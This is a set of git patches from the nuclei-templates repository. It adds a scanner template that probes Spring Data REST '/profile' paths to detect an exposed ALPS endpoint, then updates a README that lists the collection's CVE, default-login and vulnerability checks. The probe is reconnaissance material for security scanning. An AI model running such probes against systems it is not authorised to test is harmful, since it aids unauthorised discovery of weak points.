From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Mon, 11 Jan 2021 13:21:50 +0530
Subject: [PATCH 43/85] Create exposed-alps-spring.yaml

---
 exposures/configs/exposed-alps-spring.yaml | 34 ++++++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 exposures/configs/exposed-alps-spring.yaml

diff --git a/exposures/configs/exposed-alps-spring.yaml b/exposures/configs/exposed-alps-spring.yaml
new file mode 100644
index 0000000000..87b140121c
--- /dev/null
+++ b/exposures/configs/exposed-alps-spring.yaml
@@ -0,0 +1,34 @@
+id: exposed-alps-spring
+
+info:
+  name: Exposed Spring Data REST Application-Level Profile Semantics (ALPS)
+  author: dwisiswant0
+  severity: medium
+
+  # https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/profile"
+      - "{{BaseURL}}/api/profile"
+      - "{{BaseURL}}/alps/profile"
+      - "{{BaseURL}}:8080/profile"
+      - "{{BaseURL}}:8080/api/profile"
+      - "{{BaseURL}}:8080/alps/profile"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "_links"
+          - "/alps/"
+          - "profile"
+        condition: and
+        part: body
+      - type: word
+        words:
+          - "application/hal+json"
+        part: header
+      - type: status
+        status:
+          - 200

From d94bcfe9ec0cd74e223c8ad4b93717df64fc0d21 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Mon, 11 Jan 2021 14:42:23 +0530
Subject: [PATCH 44/85] readme updates

---
 README.md | 589 ++++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 589 insertions(+)
 create mode 100644 README.md

diff --git a/README.md b/README.md
new file mode 100644
index 0000000000..202ee8e15a
--- /dev/null
+++ b/README.md
@@ -0,0 +1,589 @@
+
+# Nuclei Templates
+
+[![License](https://img.shields.io/badge/license-MIT-_red.svg)](https://opensource.org/licenses/MIT)
+[![GitHub Release](https://img.shields.io/github/release/projectdiscovery/nuclei-templates)](https://github.com/projectdiscovery/nuclei-templates/releases)
+[![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/projectdiscovery/nuclei-templates/issues)
+[![Follow on Twitter](https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter)](https://twitter.com/pdnuclei)
+[![Chat on Discord](https://img.shields.io/discord/695645237418131507.svg?logo=discord)](https://discord.gg/KECAGdH)
+
+Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
+
+An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. 
+
+### Nuclei templates `v7.3.7` overview
+
+| Templates       | Counts | Templates        | Counts |
+| --------------- | ------ | ---------------- | ------ |
+| cves            | 147    | default-logins   | 0      |
+| dns             | 0      | exposed-panels   | 0      |
+| exposed-tokens  | 44     | exposures        | 0      |
+| fuzzing         | 17     | helpers          | 0      |
+| miscellaneous   | 6      | misconfiguration | 6      |
+| takeovers       | 0      | technologies     | 0      |
+| vulnerabilities | 0      | workflows        | 0      |
+
+
+### Nuclei templates `v7.3.7` tree overview
+
+<details>
+<summary> Nuclei templates </summary>
+
+```
+├── LICENSE.md
+├── README.md
+├── cves
+│   ├── 2005
+│   │   └── CVE-2005-2428.yaml
+│   ├── 2008
+│   │   └── CVE-2008-2398.yaml
+│   ├── 2013
+│   │   └── CVE-2013-2251.yaml
+│   ├── 2014
+│   │   └── CVE-2014-6271.yaml
+│   ├── 2017
+│   │   ├── CVE-2017-10075.yaml
+│   │   ├── CVE-2017-11444.yaml
+│   │   ├── CVE-2017-12637.yaml
+│   │   ├── CVE-2017-14537.yaml
+│   │   ├── CVE-2017-14849.yaml
+│   │   ├── CVE-2017-5638.yaml
+│   │   ├── CVE-2017-7391.yaml
+│   │   ├── CVE-2017-7615.yaml
+│   │   ├── CVE-2017-9506.yaml
+│   │   └── CVE-2017-9841.yaml
+│   ├── 2018
+│   │   ├── CVE-2018-0296.yaml
+│   │   ├── CVE-2018-1000129.yaml
+│   │   ├── CVE-2018-11409.yaml
+│   │   ├── CVE-2018-11759.yaml
+│   │   ├── CVE-2018-1247.yaml
+│   │   ├── CVE-2018-1271.yaml
+│   │   ├── CVE-2018-1273.yaml
+│   │   ├── CVE-2018-13379.yaml
+│   │   ├── CVE-2018-13380.yaml
+│   │   ├── CVE-2018-14728.yaml
+│   │   ├── CVE-2018-16341.yaml
+│   │   ├── CVE-2018-16763.yaml
+│   │   ├── CVE-2018-17431.yaml
+│   │   ├── CVE-2018-18069.yaml
+│   │   ├── CVE-2018-19386.yaml
+│   │   ├── CVE-2018-19439.yaml
+│   │   ├── CVE-2018-20824.yaml
+│   │   ├── CVE-2018-2791.yaml
+│   │   ├── CVE-2018-3714.yaml
+│   │   ├── CVE-2018-3760.yaml
+│   │   ├── CVE-2018-5230.yaml
+│   │   ├── CVE-2018-7251.yaml
+│   │   ├── CVE-2018-7490.yaml
+│   │   └── CVE-2018-8006.yaml
+│   ├── 2019
+│   │   ├── CVE-2019-10092.yaml
+│   │   ├── CVE-2019-1010287.yaml
+│   │   ├── CVE-2019-10475.yaml
+│   │   ├── CVE-2019-11248.yaml
+│   │   ├── CVE-2019-11510.yaml
+│   │   ├── CVE-2019-11580.yaml
+│   │   ├── CVE-2019-11581.yaml
+│   │   ├── CVE-2019-11869.yaml
+│   │   ├── CVE-2019-12314.yaml
+│   │   ├── CVE-2019-12461.yaml
+│   │   ├── CVE-2019-12593.yaml
+│   │   ├── CVE-2019-12725.yaml
+│   │   ├── CVE-2019-14223.yaml
+│   │   ├── CVE-2019-14322.yaml
+│   │   ├── CVE-2019-14696.yaml
+│   │   ├── CVE-2019-14974.yaml
+│   │   ├── CVE-2019-15043.yaml
+│   │   ├── CVE-2019-15107.yaml
+│   │   ├── CVE-2019-15858.yaml
+│   │   ├── CVE-2019-16278.yaml
+│   │   ├── CVE-2019-1653.yaml
+│   │   ├── CVE-2019-16662.yaml
+│   │   ├── CVE-2019-16759-1.yaml
+│   │   ├── CVE-2019-16759.yaml
+│   │   ├── CVE-2019-16920.yaml
+│   │   ├── CVE-2019-17382.yaml
+│   │   ├── CVE-2019-17558.yaml
+│   │   ├── CVE-2019-18394.yaml
+│   │   ├── CVE-2019-19368.yaml
+│   │   ├── CVE-2019-19781.yaml
+│   │   ├── CVE-2019-19908.yaml
+│   │   ├── CVE-2019-19985.yaml
+│   │   ├── CVE-2019-20141.yaml
+│   │   ├── CVE-2019-2588.yaml
+│   │   ├── CVE-2019-2725.yaml
+│   │   ├── CVE-2019-3396.yaml
+│   │   ├── CVE-2019-3402.yaml
+│   │   ├── CVE-2019-3799.yaml
+│   │   ├── CVE-2019-5418.yaml
+│   │   ├── CVE-2019-6112.yaml
+│   │   ├── CVE-2019-6340.yaml
+│   │   ├── CVE-2019-6715.yaml
+│   │   ├── CVE-2019-7219.yaml
+│   │   ├── CVE-2019-7256.yaml
+│   │   ├── CVE-2019-7609.yaml
+│   │   ├── CVE-2019-8442.yaml
+│   │   ├── CVE-2019-8449.yaml
+│   │   ├── CVE-2019-8451.yaml
+│   │   ├── CVE-2019-8903.yaml
+│   │   ├── CVE-2019-8982.yaml
+│   │   ├── CVE-2019-9670.yaml
+│   │   ├── CVE-2019-9733.yaml
+│   │   ├── CVE-2019-9955.yaml
+│   │   └── CVE-2019-9978.yaml
+│   └── 2020
+│       ├── CVE-2020-0618.yaml
+│       ├── CVE-2020-10148.yaml
+│       ├── CVE-2020-10199.yaml
+│       ├── CVE-2020-10204.yaml
+│       ├── CVE-2020-11034.yaml
+│       ├── CVE-2020-1147.yaml
+│       ├── CVE-2020-11738.yaml
+│       ├── CVE-2020-12116.yaml
+│       ├── CVE-2020-12720.yaml
+│       ├── CVE-2020-13167.yaml
+│       ├── CVE-2020-13942.yaml
+│       ├── CVE-2020-14179.yaml
+│       ├── CVE-2020-14181.yaml
+│       ├── CVE-2020-14864.yaml
+│       ├── CVE-2020-14882.yaml
+│       ├── CVE-2020-15129.yaml
+│       ├── CVE-2020-15505.yaml
+│       ├── CVE-2020-15920.yaml
+│       ├── CVE-2020-16139.yaml
+│       ├── CVE-2020-16846.yaml
+│       ├── CVE-2020-16952.yaml
+│       ├── CVE-2020-17505.yaml
+│       ├── CVE-2020-17506.yaml
+│       ├── CVE-2020-17518.yaml
+│       ├── CVE-2020-17519.yaml
+│       ├── CVE-2020-1943.yaml
+│       ├── CVE-2020-2096.yaml
+│       ├── CVE-2020-2140.yaml
+│       ├── CVE-2020-23972.yaml
+│       ├── CVE-2020-24223.yaml
+│       ├── CVE-2020-24312.yaml
+│       ├── CVE-2020-2551.yaml
+│       ├── CVE-2020-25540.yaml
+│       ├── CVE-2020-26214.yaml
+│       ├── CVE-2020-3187.yaml
+│       ├── CVE-2020-3452.yaml
+│       ├── CVE-2020-4463.yaml
+│       ├── CVE-2020-5284.yaml
+│       ├── CVE-2020-5405.yaml
+│       ├── CVE-2020-5410.yaml
+│       ├── CVE-2020-5412.yaml
+│       ├── CVE-2020-5776.yaml
+│       ├── CVE-2020-5777.yaml
+│       ├── CVE-2020-5902.yaml
+│       ├── CVE-2020-6287.yaml
+│       ├── CVE-2020-7209.yaml
+│       ├── CVE-2020-7318.yaml
+│       ├── CVE-2020-7961.yaml
+│       ├── CVE-2020-8091.yaml
+│       ├── CVE-2020-8115.yaml
+│       ├── CVE-2020-8163.yaml
+│       ├── CVE-2020-8191.yaml
+│       ├── CVE-2020-8193.yaml
+│       ├── CVE-2020-8194.yaml
+│       ├── CVE-2020-8209.yaml
+│       ├── CVE-2020-8512.yaml
+│       ├── CVE-2020-8982.yaml
+│       ├── CVE-2020-9047.yaml
+│       ├── CVE-2020-9344.yaml
+│       ├── CVE-2020-9484.yaml
+│       ├── CVE-2020-9496.yaml
+│       └── CVE-2020-9757.yaml
+├── default-logins
+│   ├── activemq
+│   │   └── activemq-default-login.yaml
+│   ├── ambari
+│   │   └── ambari-default-credentials.yaml
+│   ├── apache
+│   │   └── tomcat-manager-default.yaml
+│   ├── grafana
+│   │   └── grafana-default-credential.yaml
+│   ├── ofbiz
+│   │   └── ofbiz-default-credentials.yaml
+│   ├── rabbitmq
+│   │   └── rabbitmq-default-admin.yaml
+│   ├── solarwinds
+│   │   └── solarwinds-default-admin.yaml
+│   └── zabbix
+│       └── zabbix-default-credentials.yaml
+├── dns
+│   ├── azure-takeover-detection.yaml
+│   ├── cname-service-detector.yaml
+│   ├── dead-host-with-cname.yaml
+│   ├── mx-service-detector.yaml
+│   ├── servfail-refused-hosts.yaml
+│   └── spoofable-spf-records-ptr.yaml
+├── exposed-panels
+│   ├── active-admin-exposure.yaml
+│   ├── activemq-panel.yaml
+│   ├── adminer-panel.yaml
+│   ├── aims-password-mgmt-client.yaml
+│   ├── airflow-exposure.yaml
+│   ├── ambari-exposure.yaml
+│   ├── ansible-tower-exposure.yaml
+│   ├── atlassian-crowd-panel.yaml
+│   ├── cisco-asa-panel.yaml
+│   ├── citrix-adc-gateway-detect.yaml
+│   ├── citrix-vpn-detect.yaml
+│   ├── compal-panel.yaml
+│   ├── couchdb-exposure.yaml
+│   ├── couchdb-fauxton.yaml
+│   ├── crxde.yaml
+│   ├── django-admin-panel.yaml
+│   ├── druid-console-exposure.yaml
+│   ├── exposed-pagespeed-global-admin.yaml
+│   ├── exposed-webalizer.yaml
+│   ├── flink-exposure.yaml
+│   ├── fortinet-fortigate-panel.yaml
+│   ├── fortiweb-panel.yaml
+│   ├── github-enterprise-detect.yaml
+│   ├── gitlab-detect.yaml
+│   ├── globalprotect-panel.yaml
+│   ├── go-anywhere-client.yaml
+│   ├── grafana-detect.yaml
+│   ├── hadoop-exposure.yaml
+│   ├── identityguard-selfservice-entrust.yaml
+│   ├── iomega-lenovo-emc-shared-nas-detect.yaml
+│   ├── jira-detect.yaml
+│   ├── jmx-console.yaml
+│   ├── kafka-connect-ui.yaml
+│   ├── kafka-monitoring.yaml
+│   ├── kafka-topics-ui.yaml
+│   ├── kubernetes-dashboard.yaml
+│   ├── manage-engine-admanager-panel.yaml
+│   ├── mobileiron-login.yaml
+│   ├── netscaler-gateway.yaml
+│   ├── network-camera-detect.yaml
+│   ├── oipm-detect.yaml
+│   ├── parallels-html-client.yaml
+│   ├── phpmyadmin-panel.yaml
+│   ├── polycom-admin-detect.yaml
+│   ├── public-tomcat-instance.yaml
+│   ├── pulse-secure-panel.yaml
+│   ├── rabbitmq-dashboard.yaml
+│   ├── rocketmq-console-exposure.yaml
+│   ├── rsa-self-service.yaml
+│   ├── sap-hana-xsengine-panel.yaml
+│   ├── sap-netweaver-detect.yaml
+│   ├── sap-recon-detect.yaml
+│   ├── selenoid-ui-exposure.yaml
+│   ├── setup-page-exposure.yaml
+│   ├── solarwinds-orion.yaml
+│   ├── solr-exposure.yaml
+│   ├── sonarqube-login.yaml
+│   ├── sonicwall-management-panel.yaml
+│   ├── sonicwall-sslvpn-panel.yaml
+│   ├── sophos-fw-version-detect.yaml
+│   ├── supervpn-panel.yaml
+│   ├── tikiwiki-cms.yaml
+│   ├── tomcat-manager-pathnormalization.yaml
+│   ├── traefik-dashboard.yaml
+│   ├── virtual-ema-detect.yaml
+│   ├── weave-scope-dashboard-detect.yaml
+│   ├── webeditors.yaml
+│   ├── webmin-panel.yaml
+│   ├── workspace-one-uem.yaml
+│   ├── workspaceone-uem-airwatch-dashboard-detect.yaml
+│   ├── yarn-manager-exposure.yaml
+│   └── zipkin-exposure.yaml
+├── exposed-tokens
+│   ├── aws
+│   │   ├── amazon-mws-auth-token-value.yaml
+│   │   └── aws-access-key-value.yaml
+│   ├── generic
+│   │   ├── credentials-disclosure.yaml
+│   │   ├── general-tokens.yaml
+│   │   └── http-username-password.yaml
+│   ├── google
+│   │   ├── fcm-server-key.yaml
+│   │   └── google-api-key.yaml
+│   ├── mailchimp
+│   │   └── mailchimp-api-key.yaml
+│   └── slack
+│       └── slack-access-token.yaml
+├── exposures
+│   ├── apis
+│   │   ├── swagger-api.yaml
+│   │   ├── wadl-api.yaml
+│   │   └── wsdl-api.yaml
+│   ├── backups
+│   │   ├── sql-dump.yaml
+│   │   └── zip-backup-files.yaml
+│   ├── configs
+│   │   ├── airflow-configuration-exposure.yaml
+│   │   ├── amazon-docker-config-disclosure.yaml
+│   │   ├── ansible-config-disclosure.yaml
+│   │   ├── composer-config.yaml
+│   │   ├── exposed-alps-spring.yaml
+│   │   ├── exposed-svn.yaml
+│   │   ├── git-config-nginxoffbyslash.yaml
+│   │   ├── git-config.yaml
+│   │   ├── htpasswd-detection.yaml
+│   │   ├── laravel-env.yaml
+│   │   ├── magento-config.yaml
+│   │   ├── opcache-status-exposure.yaml
+│   │   ├── owncloud-config.yaml
+│   │   ├── package-json.yaml
+│   │   ├── perl-status.yaml
+│   │   ├── phpinfo.yaml
+│   │   ├── rails-database-config.yaml
+│   │   ├── redmine-db-config.yaml
+│   │   ├── server-status-localhost.yaml
+│   │   ├── syfmony-profiler.yaml
+│   │   ├── symfony-database-config.yaml
+│   │   ├── symfony-profiler.yaml
+│   │   └── web-config.yaml
+│   ├── files
+│   │   ├── domcfg-page.yaml
+│   │   ├── drupal-install.yaml
+│   │   ├── ds_store.yaml
+│   │   ├── exposed-alps-spring.yaml
+│   │   ├── filezilla.yaml
+│   │   ├── lazy-file.yaml
+│   │   ├── server-private-keys.yaml
+│   │   └── xprober-service.yaml
+│   └── logs
+│       ├── elmah-log-file.yaml
+│       ├── error-logs.yaml
+│       ├── rails-debug-mode.yaml
+│       ├── struts-debug-mode.yaml
+│       └── trace-axd-detect.yaml
+├── fuzzing
+│   ├── arbitrary-file-read.yaml
+│   ├── basic-auth-bruteforce.yaml
+│   ├── directory-traversal.yaml
+│   ├── generic-lfi-fuzzing.yaml
+│   ├── iis-shortname.yaml
+│   └── wp-plugin-scan.yaml
+├── helpers
+│   ├── payloads
+│   │   ├── CVE-2020-5776.csv
+│   │   └── CVE-2020-6287.xml
+│   └── wordlists
+│       └── wp-plugins.txt
+├── miscellaneous
+│   ├── basic-cors-flash.yaml
+│   ├── dir-listing.yaml
+│   ├── htaccess-config.yaml
+│   ├── missing-csp.yaml
+│   ├── missing-hsts.yaml
+│   ├── missing-x-frame-options.yaml
+│   ├── ntlm-directories.yaml
+│   ├── old-copyright.yaml
+│   ├── robots.txt.yaml
+│   ├── security.txt.yaml
+│   ├── trace-method.yaml
+│   ├── unencrypted-bigip-ltm-cookie.yaml
+│   ├── wp-xmlrpc.yaml
+│   └── xml-schema-detect.yaml
+├── misconfiguration
+│   ├── aem-groovyconsole.yaml
+│   ├── airflow-api-exposure.yaml
+│   ├── apache-tomcat-snoop.yaml
+│   ├── apc-info.yaml
+│   ├── aspx-debug-mode.yaml
+│   ├── aws-redirect.yaml
+│   ├── cgi-test-page.yaml
+│   ├── django-debug-detect.yaml
+│   ├── docker-api.yaml
+│   ├── docker-registry.yaml
+│   ├── druid-monitor.yaml
+│   ├── drupal-user-enum-ajax.yaml
+│   ├── drupal-user-enum-redirect.yaml
+│   ├── elasticsearch.yaml
+│   ├── exposed-kibana.yaml
+│   ├── exposed-service-now.yaml
+│   ├── front-page-misconfig.yaml
+│   ├── hadoop-unauth.yaml
+│   ├── jkstatus-manager.yaml
+│   ├── jupyter-ipython-unauth.yaml
+│   ├── kubernetes-pods.yaml
+│   ├── larvel-debug.yaml
+│   ├── linkerd-ssrf-detect.yaml
+│   ├── manage-engine-ad-search.yaml
+│   ├── php-errors.yaml
+│   ├── put-method-enabled.yaml
+│   ├── rack-mini-profiler.yaml
+│   ├── salesforce-aura-misconfig.yaml
+│   ├── shell-history.yaml
+│   ├── sidekiq-dashboard.yaml
+│   ├── springboot-detect.yaml
+│   ├── symfony-debugmode.yaml
+│   ├── tomcat-scripts.yaml
+│   ├── unauthenticated-airflow.yaml
+│   ├── unauthenticated-nacos-access.yaml
+│   ├── wamp-xdebug-detect.yaml
+│   └── zenphoto-installation-sensitive-info.yaml
+├── takeovers
+│   └── subdomain-takeover.yaml
+├── technologies
+│   ├── apache-detect.yaml
+│   ├── artica-web-proxy-detect.yaml
+│   ├── basic-auth-detection.yaml
+│   ├── bigip-config-utility-detect.yaml
+│   ├── cacti-detect.yaml
+│   ├── clockwork-php-page.yaml
+│   ├── couchdb-detect.yaml
+│   ├── favicon-detection.yaml
+│   ├── firebase-detect.yaml
+│   ├── google-storage.yaml
+│   ├── graphql.yaml
+│   ├── graylog-api-browser.yaml
+│   ├── home-assistant.yaml
+│   ├── jaspersoft-detect.yaml
+│   ├── jolokia.yaml
+│   ├── kibana-detect.yaml
+│   ├── kong-detect.yaml
+│   ├── liferay-portal-detect.yaml
+│   ├── linkerd-badrule-detect.yaml
+│   ├── lotus-domino-version.yaml
+│   ├── magmi-detect.yaml
+│   ├── mrtg-detect.yaml
+│   ├── netsweeper-webadmin-detect.yaml
+│   ├── nifi-detech.yaml
+│   ├── oidc-detect.yaml
+│   ├── pi-hole-detect.yaml
+│   ├── prometheus-exporter-detect.yaml
+│   ├── prometheus-exposed-panel.yaml
+│   ├── prtg-detect.yaml
+│   ├── redmine-cli-detect.yaml
+│   ├── s3-detect.yaml
+│   ├── sap-netweaver-as-java-detect.yaml
+│   ├── sap-netweaver-detect.yaml
+│   ├── shiro-detect.yaml
+│   ├── sql-server-reporting.yaml
+│   ├── tech-detect.yaml
+│   ├── telerik-dialoghandler-detect.yaml
+│   ├── telerik-fileupload-detect.yaml
+│   ├── terraform-detect.yaml
+│   ├── tomcat-detect.yaml
+│   ├── tor-socks-proxy.yaml
+│   ├── waf-detect.yaml
+│   ├── weblogic-detect.yaml
+│   └── werkzeug-debugger-detect.yaml
+├── vulnerabilities
+│   ├── generic
+│   │   ├── basic-cors.yaml
+│   │   ├── basic-xss-prober.yaml
+│   │   ├── crlf-injection.yaml
+│   │   ├── top-xss-params.yaml
+│   │   └── url-redirect.yaml
+│   ├── ibm
+│   │   ├── eclipse-help-system-xss.yaml
+│   │   └── ibm-infoprint-directory-traversal.yaml
+│   ├── jenkins
+│   │   ├── jenkins-asyncpeople.yaml
+│   │   ├── jenkins-stack-trace.yaml
+│   │   └── unauthenticated-jenkin-dashboard.yaml
+│   ├── jira
+│   │   ├── jira-service-desk-signup.yaml
+│   │   ├── jira-unauthenticated-dashboards.yaml
+│   │   ├── jira-unauthenticated-popular-filters.yaml
+│   │   ├── jira-unauthenticated-projects.yaml
+│   │   └── jira-unauthenticated-user-picker.yaml
+│   ├── moodle
+│   │   ├── moodle-filter-jmol-lfi.yaml
+│   │   └── moodle-filter-jmol-xss.yaml
+│   ├── oracle
+│   │   └── oracle-ebs-bispgraph-file-access.yaml
+│   ├── other
+│   │   ├── acme-xss.yaml
+│   │   ├── aspnuke-openredirect.yaml
+│   │   ├── bullwark-momentum-series-directory-traversal.yaml
+│   │   ├── cached-aem-pages.yaml
+│   │   ├── couchdb-adminparty.yaml
+│   │   ├── discourse-xss.yaml
+│   │   ├── mcafee-epo-rce.yaml
+│   │   ├── microstrategy-ssrf.yaml
+│   │   ├── mida-eframework-xss.yaml
+│   │   ├── nginx-module-vts-xss.yaml
+│   │   ├── nuuo-nvrmini2-rce.yaml
+│   │   ├── pdf-signer-ssti-to-rce.yaml
+│   │   ├── rce-shellshock-user-agent.yaml
+│   │   ├── rce-via-java-deserialization.yaml
+│   │   ├── rconfig-rce.yaml
+│   │   ├── sick-beard-xss.yaml
+│   │   ├── symantec-messaging-gateway.yaml
+│   │   ├── thinkific-redirect.yaml
+│   │   ├── tikiwiki-reflected-xss.yaml
+│   │   ├── twig-php-ssti.yaml
+│   │   ├── vpms-auth-bypass.yaml
+│   │   ├── wems-manager-xss.yaml
+│   │   ├── yarn-resourcemanager-rce.yaml
+│   │   └── zms-auth-bypass.yaml
+│   ├── rails
+│   │   └── rails6-xss.yaml
+│   ├── springboot
+│   │   ├── springboot-actuators-jolokia-xxe.yaml
+│   │   └── springboot-h2-db-rce.yaml
+│   ├── thinkific-redirect.yaml
+│   ├── vmware
+│   │   ├── vmware-vcenter-lfi-linux.yaml
+│   │   └── vmware-vcenter-lfi.yaml
+│   └── wordpress
+│       ├── easy-wp-smtp-listing.yaml
+│       ├── sassy-social-share.yaml
+│       ├── w3c-total-cache-ssrf.yaml
+│       ├── wordpress-accessible-wpconfig.yaml
+│       ├── wordpress-db-backup.yaml
+│       ├── wordpress-debug-log.yaml
+│       ├── wordpress-directory-listing.yaml
+│       ├── wordpress-emails-verification-for-woocommerce.yaml
+│       ├── wordpress-emergency-script.yaml
+│       ├── wordpress-installer-log.yaml
+│       ├── wordpress-social-metrics-tracker.yaml
+│       ├── wordpress-tmm-db-migrate.yaml
+│       ├── wordpress-user-enumeration.yaml
+│       ├── wordpress-wordfence-xss.yaml
+│       └── wordpress-wpcourses-info-disclosure.yaml
+└── workflows
+    ├── artica-web-proxy-workflow.yaml
+    ├── basic-auth-workflow.yaml
+    ├── bigip-workflow.yaml
+    ├── cisco-asa-workflow.yaml
+    ├── grafana-workflow.yaml
+    ├── jira-workflow.yaml
+    ├── liferay-workflow.yaml
+    ├── lotus-domino-workflow.yaml
+    ├── magmi-workflow.yaml
+    ├── mida-eframework-workflow.yaml
+    ├── netsweeper-workflow.yaml
+    ├── rabbitmq-workflow.yaml
+    ├── sap-netweaver-workflow.yaml
+    ├── solarwinds-orion-workflow.yaml
+    ├── springboot-workflow.yaml
+    ├── vbulletin-workflow.yaml
+    └── wordpress-workflow.yaml
+```
+
+</details>
+
+**53 directories, 476 files**.
+
+📖 Documentation
+-----
+
+Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
+
+💪 Contributions
+-----
+
+Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
+
+👨‍💻 Community
+-----
+
+You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
+
+💡 Notes
+-----
+-  Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
+
+
+Thanks again for your contribution and keeping the community vibrant. :heart:

From f128031addc6e68206a37029ee15e94a9192cbe9 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Mon, 11 Jan 2021 14:43:33 +0530
Subject: [PATCH 45/85] Update README.md

---
 README.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/README.md b/README.md
index 202ee8e15a..aef71e02ee 100644
--- a/README.md
+++ b/README.md
@@ -12,6 +12,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. 
 
 ### Nuclei templates `v7.3.7` overview
+-----
 
 | Templates       | Counts | Templates        | Counts |
 | --------------- | ------ | ---------------- | ------ |
@@ -25,6 +26,7 @@ An overview of the nuclei template directory including number of templates and H
 
 
 ### Nuclei templates `v7.3.7` tree overview
+-----
 
 <details>
 <summary> Nuclei templates </summary>

From 5a3dccca5b01f14d3960bea539705cdba5ea7334 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Mon, 11 Jan 2021 09:14:17 +0000
Subject: [PATCH 46/85] Auto Update README [Mon Jan 11 09:14:17 UTC 2021]
 :robot:

---
 README.md | 45 +++++++++++++++------------------------------
 1 file changed, 15 insertions(+), 30 deletions(-)

diff --git a/README.md b/README.md
index aef71e02ee..5b4b264cbb 100644
--- a/README.md
+++ b/README.md
@@ -12,21 +12,19 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. 
 
 ### Nuclei templates `v7.3.7` overview
------
 
-| Templates       | Counts | Templates        | Counts |
-| --------------- | ------ | ---------------- | ------ |
-| cves            | 147    | default-logins   | 0      |
-| dns             | 0      | exposed-panels   | 0      |
-| exposed-tokens  | 44     | exposures        | 0      |
-| fuzzing         | 17     | helpers          | 0      |
-| miscellaneous   | 6      | misconfiguration | 6      |
-| takeovers       | 0      | technologies     | 0      |
-| vulnerabilities | 0      | workflows        | 0      |
+| Templates       | Counts                          | Templates        | Counts                         |
+| --------------- | ------------------------------- | ---------------- | ------------------------------ |
+| cves            | 154            | default-logins   | 8 |
+| dns             | 6               | exposed-panels   | 72   |
+| exposed-tokens  | 9  | exposures        | 41      |
+| fuzzing         | 6           | helpers          | 3        |
+| miscellaneous   | 14     | misconfiguration | 37 |
+| takeovers       | 1         | technologies     | 44     |
+| vulnerabilities | 62 | workflows        | 17        |
 
 
 ### Nuclei templates `v7.3.7` tree overview
------
 
 <details>
 <summary> Nuclei templates </summary>
@@ -566,26 +564,13 @@ An overview of the nuclei template directory including number of templates and H
 
 </details>
 
-**53 directories, 476 files**.
+**53 directories, 477 files**.
 
-📖 Documentation
------
-
-Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
-
-💪 Contributions
------
-
-Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
-
-👨‍💻 Community
------
-
-You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
-
-💡 Notes
------
--  Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
+Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. 
 
+------
+**Notes:** 
+1. Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/)) to validate new templates when sending pull requests.
+2. Use YAML Formatter (e.g. [jsonformatter](https://jsonformatter.org/yaml-formatter)) to format new templates when sending pull requests.
 
 Thanks again for your contribution and keeping the community vibrant. :heart:

From 2411de1934d9bd6438627169b7c3dc9af0a12d7a Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Mon, 11 Jan 2021 14:46:07 +0530
Subject: [PATCH 47/85] readme updates

---
 .github/scripts/README.tmpl | 25 ++++++++++++++++++++-----
 1 file changed, 20 insertions(+), 5 deletions(-)

diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl
index b564f8fccf..4d10939eda 100644
--- a/.github/scripts/README.tmpl
+++ b/.github/scripts/README.tmpl
@@ -12,6 +12,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. 
 
 ### Nuclei templates `{version}` overview
+------
 
 | Templates       | Counts                          | Templates        | Counts                         |
